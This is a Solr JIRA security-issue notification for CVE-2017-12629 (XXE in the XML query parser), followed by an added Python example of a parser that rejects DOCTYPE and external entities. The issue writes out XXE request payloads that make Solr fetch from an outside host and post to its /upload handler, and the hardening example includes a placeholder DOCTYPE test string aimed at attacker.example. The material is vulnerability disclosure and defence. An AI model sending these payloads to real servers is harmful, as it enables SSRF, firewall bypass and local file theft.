[ https://issues.apache.org/jira/browse/SOLR-11477?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Uwe Schindler updated SOLR-11477:
---------------------------------
    Security: Public  (was: Private (Security Issue))

> CVE-2017-12629: Disable external entities in XML query parser
> -------------------------------------------------------------
>
>                 Key: SOLR-11477
>                 URL: https://issues.apache.org/jira/browse/SOLR-11477
>             Project: Solr
>          Issue Type: Task
>      Security Level: Public (Default Security Level. Issues are Public)
>          Components: query parsers, security
>            Reporter: Christine Poerschke
>            Assignee: Uwe Schindler
>            Priority: Blocker
>             Fix For: 5.5.5, 7.1, 7.2, master (8.0), 6.6.2
>
>         Attachments: SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch
>
>
> Lucene includes a query parser that is able to create the full spectrum of Lucene queries, using an XML data structure. Starting from version 5.1, Solr supports the "xml" query parser in the search query.
>
> The problem is that the Lucene XML parser does not explicitly prohibit DOCTYPE declarations and expansion of external entities. It is possible to include special entities in the XML document that point to external files (via file://) or external URLs (via http://):
>
> Example usage:
> {noformat}
> http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxx.s.artsploit.com/xxx"><a></a>'}
> {noformat}
>
> When Solr is parsing this request, it makes an HTTP request to http://xxx.s.artsploit.com/xxx and treats its content as the DOCTYPE definition.
>
> Considering that we can define the parser type in the search query, which very often comes from untrusted user input, e.g. search fields on websites, this allows an external attacker to make arbitrary HTTP requests to the local SOLR instance and to bypass all firewall restrictions.
>
> For example, this vulnerability could be used to send malicious data to the '/upload' handler:
> {noformat}
> http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxx.s.artsploit.com/solr/gettingstarted/upload?stream.body={"xx":"yy"}&commit=true"'><a></a>'}
> {noformat}
>
> This vulnerability can also be exploited as Blind XXE using the FTP wrapper in order to read arbitrary local files from the Solr server.

--
This message was sent by Atlassian JIRA
(v6.4.14#64029)
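The parser hardening the issue asks for, as an added example that is not the Solr patch itself: it uses Python's standard-library expat bindings instead of Lucene's Java parser, and the query bodies and the host attacker.example are constructed for the demonstration. Any DOCTYPE (external subset or inline entity definitions) is refused before it is processed, and external entity references are never resolved.

```python
import xml.parsers.expat


class ForbiddenXmlConstruct(Exception):
    """Raised when a query body carries a DOCTYPE or an external entity reference."""


def parse_query_xml(xml_text):
    """Parse an {!xmlparser} query body with DOCTYPE and external entities refused.

    Returns the (element_name, attributes) pairs seen in document order, so a
    caller can confirm that rejected input never reaches element handling.
    """
    parser = xml.parsers.expat.ParserCreate()
    seen = []

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        # Equivalent of the 'disallow-doctype-decl' feature: a DOCTYPE naming an
        # external subset (SYSTEM "http://..." or file://) or defining entities
        # inline is refused as soon as the declaration starts.
        raise ForbiddenXmlConstruct(
            f"DOCTYPE {name!r} is not allowed (system_id={system_id!r})")

    def reject_external_entity(context, base, system_id, public_id):
        # Defence in depth: never fetch anything referenced by a SYSTEM/PUBLIC id.
        raise ForbiddenXmlConstruct(f"external entity {system_id!r} is not allowed")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = reject_external_entity
    parser.StartElementHandler = lambda name, attrs: seen.append((name, attrs))
    parser.Parse(xml_text, True)
    return seen


def is_acceptable_query_body(xml_text):
    """True if the body parses under the hardened parser, False if it is rejected."""
    try:
        parse_query_xml(xml_text)
        return True
    except (ForbiddenXmlConstruct, xml.parsers.expat.ExpatError):
        return False


if __name__ == "__main__":
    # Constructed inputs: a benign query body and the DOCTYPE shape from the
    # report with a placeholder host.
    benign = '<TermQuery fieldName="title">solr</TermQuery>'
    hostile = '<!DOCTYPE a SYSTEM "http://attacker.example/xxx"><a></a>'
    print(is_acceptable_query_body(benign), is_acceptable_query_body(hostile))
```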